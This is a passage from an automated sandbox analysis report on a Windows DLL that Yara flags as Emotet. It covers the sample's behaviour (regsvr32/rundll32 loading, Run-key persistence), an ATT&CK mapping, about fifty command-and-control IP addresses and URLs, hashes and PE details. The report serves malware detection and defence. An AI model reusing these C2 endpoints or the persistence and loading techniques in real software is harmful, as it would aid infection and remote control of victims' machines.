HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 115.178.55.22 80			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 172.105.115.71 8080			Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\U9M1w8FHBW.dll",#1

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_00007FFD1466AB50 cpuid

0_2_00007FFD1466AB50

Source: C:\Windows\System32\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_00007FFD14664A94 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FFD14664A94

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 17.2.regsvr32.exe.c70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.1040000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.188495d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.c70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll64.exe.2a683620000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.2080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2735fb40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll64.exe.2a683620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.2080000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.188495d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2735fb40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.1040000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.768069607.0000000001040000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.410373620.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.409459454.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.263891789.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.258125944.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.261350694.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.264795358.00000188495D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.263846204.000002A683620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.769531041.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.262118091.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.258558798.000002735FB40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	11 Registry Run Keys / Startup Folder	111 Process Injection	21 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	111 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Hidden Files and Directories	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Regsvr32	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Rundll32	DCSync	24 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 File Deletion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
U9M1w8FHBW.dll	45%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
17.2.regsvr32.exe.c70000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
4.2.rundll32.exe.2735fb40000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
3.2.regsvr32.exe.2080000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
5.2.rundll32.exe.188495d0000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
6.2.regsvr32.exe.1040000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
0.2.loaddll64.exe.2a683620000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://172.105.115.71:8080/s.dll6	0%	Avira URL Cloud	safe
https://172.105.115.71:8080/cwaajpktaow/wluuqgbutatftfws/jndwc/hjilgypgsuce/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://172.105.115.71:8080/cwaajpktaow/wluuqgbutatftfws/jndwc/hjilgypgsuce/	regsvr32.exe, 00000006.00000003.495564956.0000000001106000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.408031746.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.495650416.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.407564548.0000000001106000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.768591524.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://172.105.115.71:8080/s.dll6	regsvr32.exe, 00000006.00000003.408031746.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.408084828.00000000010DD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.768492623.00000000010DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.105.115.71	unknown	United States	63949	LINODE-APLinodeLLCUS	true
188.165.79.151	unknown	France	16276	OVHFR	true
196.44.98.190	unknown	Ghana	327814	EcobandGH	true
174.138.33.49	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
36.67.23.59	unknown	Indonesia	17974	TELKOMNET-AS2-APPTTelekomunikasiIndonesiaID	true
103.41.204.169	unknown	Indonesia	58397	INFINYS-AS-IDPTInfinysSystemIndonesiaID	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
83.229.80.93	unknown	United Kingdom	8513	SKYVISIONGB	true
198.199.70.22	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
93.104.209.107	unknown	Germany	8767	MNET-ASGermanyDE	true
186.250.48.5	unknown	Brazil	262807	RedfoxTelecomunicacoesLtdaBR	true
209.239.112.82	unknown	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
175.126.176.79	unknown	Korea Republic of	9523	MOKWON-AS-KRMokwonUniversityKR	true
128.199.242.164	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	true
178.238.225.252	unknown	Germany	51167	CONTABODE	true
46.101.98.60	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true
190.145.8.4	unknown	Colombia	14080	TelmexColombiaSACO	true
82.98.180.154	unknown	Spain	42612	DINAHOSTING-ASES	true
103.71.99.57	unknown	India	135682	AWDHPL-AS-INAdvikaWebDevelopmentsHostingPvtLtdIN	true
87.106.97.83	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
103.254.12.236	unknown	Viet Nam	56151	DIGISTAR-VNDigiStarCompanyLimitedVN	true
103.85.95.4	unknown	Indonesia	136077	IDNIC-UNSRAT-AS-IDUniversitasIslamNegeriMataramID	true
202.134.4.210	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
165.22.254.236	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
118.98.72.86	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
139.59.80.108	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
104.244.79.94	unknown	United States	53667	PONYNETUS	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
51.75.33.122	unknown	France	16276	OVHFR	true
160.16.143.191	unknown	Japan	9370	SAKURA-BSAKURAInternetIncJP	true
103.56.149.105	unknown	Indonesia	55688	BEON-AS-IDPTBeonIntermediaID	true
85.25.120.45	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
139.196.72.155	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	true
115.178.55.22	unknown	Indonesia	38783	SIMAYA-AS-IDPTSimayaJejaringMandiriID	true
103.126.216.86	unknown	Bangladesh	138482	SKYVIEW-AS-APSKYVIEWONLINELTDBD	true
128.199.217.206	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	true
114.79.130.68	unknown	India	45769	DVOIS-IND-VoisBroadbandPvtLtdIN	true
103.224.241.74	unknown	India	133296	WEBWERKS-AS-INWebWerksIndiaPvtLtdIN	true
210.57.209.142	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
202.28.34.99	unknown	Thailand	9562	MSU-TH-APMahasarakhamUniversityTH	true
80.211.107.116	unknown	Italy	31034	ARUBA-ASNIT	true
54.37.228.122	unknown	France	16276	OVHFR	true
218.38.121.17	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
185.148.169.10	unknown	Germany	44780	EVERSCALE-ASDE	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
178.62.112.199	unknown	European Union	14061	DIGITALOCEAN-ASNUS	true
62.171.178.147	unknown	United Kingdom	51167	CONTABODE	true
64.227.55.231	unknown	United States	14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	745001
Start date and time:	2022-11-13 16:53:52 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	U9M1w8FHBW.exe (renamed file extension from exe to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.evad.winDLL@21/2@0/49
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 58.8% (good quality ratio 53.4%) Quality average: 60.9% Quality standard deviation: 31.8%
HCA Information:	Successful, ratio: 99% Number of executed functions: 61 Number of non-executed functions: 170
Cookbook Comments:	Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cdn.onenote.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:55:34	API Interceptor	2x Sleep call for process: regsvr32.exe modified
16:55:47	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run NZICbhYKmnAVT.dll C:\Windows\system32\regsvr32.exe "C:\Windows\system32\DChihhZAEIop\NZICbhYKmnAVT.dll"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
172.105.115.71	mqMIxHWdwe.dll	Get hash	malicious	Browse
	i590SBAZAI.dll	Get hash	malicious	Browse
	rbh8gbxi93.dll	Get hash	malicious	Browse
	aukDPlAxnc.dll	Get hash	malicious	Browse
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse
	eki0vpuCvx.dll	Get hash	malicious	Browse
	mqMIxHWdwe.dll	Get hash	malicious	Browse
	i590SBAZAI.dll	Get hash	malicious	Browse
	rbh8gbxi93.dll	Get hash	malicious	Browse
	aukDPlAxnc.dll	Get hash	malicious	Browse
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse
	eki0vpuCvx.dll	Get hash	malicious	Browse
	poXIurSG6I.dll	Get hash	malicious	Browse
	poXIurSG6I.dll	Get hash	malicious	Browse
	03ePyjH6iP.dll	Get hash	malicious	Browse
	UHUTnbbdkB.dll	Get hash	malicious	Browse
	JGL3dKVcIJ.dll	Get hash	malicious	Browse
	NvoR4NccZ8.dll	Get hash	malicious	Browse
	6VR0bhRADO.dll	Get hash	malicious	Browse
	03ePyjH6iP.dll	Get hash	malicious	Browse
188.165.79.151	mqMIxHWdwe.dll	Get hash	malicious	Browse
	i590SBAZAI.dll	Get hash	malicious	Browse
	rbh8gbxi93.dll	Get hash	malicious	Browse
	aukDPlAxnc.dll	Get hash	malicious	Browse
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse
	eki0vpuCvx.dll	Get hash	malicious	Browse
	mqMIxHWdwe.dll	Get hash	malicious	Browse
	i590SBAZAI.dll	Get hash	malicious	Browse
	rbh8gbxi93.dll	Get hash	malicious	Browse
	aukDPlAxnc.dll	Get hash	malicious	Browse
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse
	eki0vpuCvx.dll	Get hash	malicious	Browse
	poXIurSG6I.dll	Get hash	malicious	Browse
	poXIurSG6I.dll	Get hash	malicious	Browse
	03ePyjH6iP.dll	Get hash	malicious	Browse
	UHUTnbbdkB.dll	Get hash	malicious	Browse
	JGL3dKVcIJ.dll	Get hash	malicious	Browse
	NvoR4NccZ8.dll	Get hash	malicious	Browse
	6VR0bhRADO.dll	Get hash	malicious	Browse
	03ePyjH6iP.dll	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LINODE-APLinodeLLCUS	mqMIxHWdwe.dll	Get hash	malicious	Browse	172.105.115.71
	ozZDLYwvhE.dll	Get hash	malicious	Browse	172.105.226.75
	i590SBAZAI.dll	Get hash	malicious	Browse	172.105.115.71
	rbh8gbxi93.dll	Get hash	malicious	Browse	172.105.115.71
	aukDPlAxnc.dll	Get hash	malicious	Browse	172.105.115.71
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse	172.105.115.71
	eki0vpuCvx.dll	Get hash	malicious	Browse	172.105.115.71
	mqMIxHWdwe.dll	Get hash	malicious	Browse	172.105.115.71
	ozZDLYwvhE.dll	Get hash	malicious	Browse	172.105.226.75
	i590SBAZAI.dll	Get hash	malicious	Browse	172.105.115.71
	rbh8gbxi93.dll	Get hash	malicious	Browse	172.105.115.71
	aukDPlAxnc.dll	Get hash	malicious	Browse	172.105.115.71
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse	172.105.115.71
	eki0vpuCvx.dll	Get hash	malicious	Browse	172.105.115.71
	poXIurSG6I.dll	Get hash	malicious	Browse	172.105.115.71
	poXIurSG6I.dll	Get hash	malicious	Browse	172.105.115.71
	03ePyjH6iP.dll	Get hash	malicious	Browse	172.105.115.71
	UHUTnbbdkB.dll	Get hash	malicious	Browse	172.105.115.71
	JGL3dKVcIJ.dll	Get hash	malicious	Browse	172.105.115.71
	NvoR4NccZ8.dll	Get hash	malicious	Browse	172.105.115.71
OVHFR	Kjx74pqege.dll	Get hash	malicious	Browse	54.37.228.122
	mqMIxHWdwe.dll	Get hash	malicious	Browse	54.37.228.122
	ozZDLYwvhE.dll	Get hash	malicious	Browse	94.23.45.86
	i590SBAZAI.dll	Get hash	malicious	Browse	54.37.228.122
	rbh8gbxi93.dll	Get hash	malicious	Browse	54.37.228.122
	aukDPlAxnc.dll	Get hash	malicious	Browse	54.37.228.122
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse	54.37.228.122
	eki0vpuCvx.dll	Get hash	malicious	Browse	54.37.228.122
	mqMIxHWdwe.dll	Get hash	malicious	Browse	54.37.228.122
	ozZDLYwvhE.dll	Get hash	malicious	Browse	94.23.45.86
	i590SBAZAI.dll	Get hash	malicious	Browse	54.37.228.122
	rbh8gbxi93.dll	Get hash	malicious	Browse	54.37.228.122
	aukDPlAxnc.dll	Get hash	malicious	Browse	54.37.228.122
	Hjz5QKa9UZ.dll	Get hash	malicious	Browse	54.37.228.122
	eki0vpuCvx.dll	Get hash	malicious	Browse	54.37.228.122
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	213.32.44.120
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 62919 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	62919
Entropy (8bit):	7.995280921994772
Encrypted:	true
SSDEEP:	1536:d+OfVxHl7Wyf11lYom3xQcRVOtPHwQV4rP6Ji7:d+OxHxJlZcuPt4b6q
MD5:	3DCF580A93972319E82CAFBC047D34D5
SHA1:	8528D2A1363E5DE77DC3B1142850E51EAD0F4B6B
SHA-256:	40810E31F1B69075C727E6D557F9614D5880112895FF6F4DF1767E87AE5640D1
SHA-512:	98384BE7218340F95DAE88D1CB865F23A0B4E12855BEB6E74A3752274C9B4C601E493864DB777BCA677A370D0A9DBFFD68D94898A82014537F3A801CCE839C42
Malicious:	false
Preview:	MSCF............,...................I.......Q.........GU.\ .authroot.stl..O..5..CK..<Tk...c_.d....A.K...+.d.-;%.BJII!.QIR..$t)Kd.-QQ...g......^..~\|N=...y....{. .4{...W....b.i...j.I.......1:..b\.0.....Ait.2t......w.%.&.",tL_...4.8L[G..;.57....AT.k.......V..K......(....mzS...G....r.".=H.?>.........x&...S%....X.M^..j...A..x.9`.9...A../.s..#.4#.....Id.w..B....s.8..(...dj....=L.)..s.d.]NxQX8....stV#.K.'7.tH..9u~.2..!..2./.....!..9C../...mP $..../y.....@p.6.}.`...5. 0r.w...@(.. .Q....)g.........m..z.8rR..).].T9r<.L....0..`.........c.....;-.g..;.wk.)......i..c5.....{v.u...AS..=.....&.:.........+..P.N..9..EAQ.V.$s.......B.`.Mfe..8.......$...y-.q9J........W...2.Q8...O.......i..@\^.=X..dG$.M..#=....m.h..{9.'...-.v..Z...!....z.....N....i..^..,........d...%Xa~q.@D\|0...Y.m...........&d.4..A..{t=...../.t.3._.....?-.....uroP?.d.Z..S..{...$.i....X..$.O..4..N.)....U.Z..P....X,.... ...Lg..35..W..s.!c...Ap.].P..8..M..W.......U..,...m.u..\|=.m1..~..!..b...._.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.102438432618431
Encrypted:	false
SSDEEP:	6:kKbPN1HlNiN+SkQlPlEGYRMY9z+4KlDA3RUeKlTAlWRyf1:T1/kPlE99SNxAhUexYo1
MD5:	C5D574CB0C172F23F4FA0A6CD46F58FA
SHA1:	B31906B042211A40976D19F1D9733F5A5CA0BC06
SHA-256:	C159ED77B959AC8C54DC9B7120E33F2E194DB6D34DD64C6F2D661C1582830866
SHA-512:	92280E06A092C84EB8FE47D57AC8B50370538AFF81C0993D2FD785174BD491312E61A0C5648569F951462E0534B6D2FD9C6B4976493A4C37BB8CA043ACABB5C0
Malicious:	false
Preview:	p...... ........h=......(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.d.e.4.d.3.9.b.e.8.d.8.1.:.0."...

Static File Info

General

File type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Entropy (8bit):	6.619158532207453
TrID:	Win64 Dynamic Link Library (generic) (102004/3) 86.43% Win64 Executable (generic) (12005/4) 10.17% Generic Win/DOS Executable (2004/3) 1.70% DOS Executable Generic (2002/1) 1.70% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:	U9M1w8FHBW.dll
File size:	528896
MD5:	deab9f2826fa9d755e77a010c51effb8
SHA1:	a44e1cd6ca3c8c7bad9ad286ba9e19ab2a6e8190
SHA256:	b3dbb3902ed3e35a1f314f2b9385c2f020d4182cf0e93a9157cb0275548d72cc
SHA512:	630eeb1693b7883ce84c539d929dcb73aca68b6247793f3aa8b19f5f8faa13c5cd5397afbdf8271bacc8733d96b47106049ac893fdb83d2c04ace7c97623f060
SSDEEP:	6144:mW1239bnTe+0Qv7NSEBj43USaI6Y/jOpxHRikSYI+QALgIJ1divndEXTn:mW1e9PeexPBjvKSpuvYI+TLgs1dcEXT
TLSH:	53B4F829A59E76F0C951A1F5A0420B1595F33C88FEF68EAF03502F296F6F24425F768C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................$...s...$...............................$.......$...............`.......`.......e.h.....`.......Rich...........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:	0x1800044e0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x180000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x636D6724 [Thu Nov 10 21:03:32 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	81146e0614ccc4eb7174ad2ad695dedb

Entrypoint Preview

Instruction
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], esi
push edi
dec eax
sub esp, 20h
dec ecx
mov edi, eax
mov ebx, edx
dec eax
mov esi, ecx
cmp edx, 01h
jne 00007FA07479D587h
call 00007FA07479DB18h
dec esp
mov eax, edi
mov edx, ebx
dec eax
mov ecx, esi
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov esi, dword ptr [esp+38h]
dec eax
add esp, 20h
pop edi
jmp 00007FA07479D3FCh
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
dec eax
mov eax, edx
dec eax
lea ecx, dword ptr [00033F0Dh]
dec eax
mov dword ptr [ebx], ecx
dec eax
lea edx, dword ptr [ebx+08h]
xor ecx, ecx
dec eax
mov dword ptr [edx], ecx
dec eax
mov dword ptr [edx+08h], ecx
dec eax
lea ecx, dword ptr [eax+08h]
call 00007FA07479FD81h
dec eax
lea eax, dword ptr [00033F1Dh]
dec eax
mov dword ptr [ebx], eax
dec eax
mov eax, ebx
dec eax
add esp, 20h
pop ebx
ret
int3
xor eax, eax
dec eax
mov dword ptr [ecx+10h], eax
dec eax
lea eax, dword ptr [00033F13h]
dec eax
mov dword ptr [ecx+08h], eax
dec eax
lea eax, dword ptr [00033EF8h]
dec eax
mov dword ptr [ecx], eax
dec eax
mov eax, ecx
ret
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
dec eax
mov eax, edx
dec eax
lea ecx, dword ptr [00033EADh]
dec eax
mov dword ptr [ebx], ecx
dec eax
lea edx, dword ptr [ebx+08h]
xor ecx, ecx
dec eax
mov dword ptr [edx], ecx
dec eax
mov dword ptr [edx+08h], ecx
dec eax
lea ecx, dword ptr [eax+08h]

Rich Headers

Programming Language:

[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7cda0	0x58	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7cdf8	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x87000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x82000	0x192c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x88000	0x66c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x7a410	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x7a430	0x94	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x38000	0x370	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x36fd5	0x37000	False	0.38967507102272725	data	5.930785005703424	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
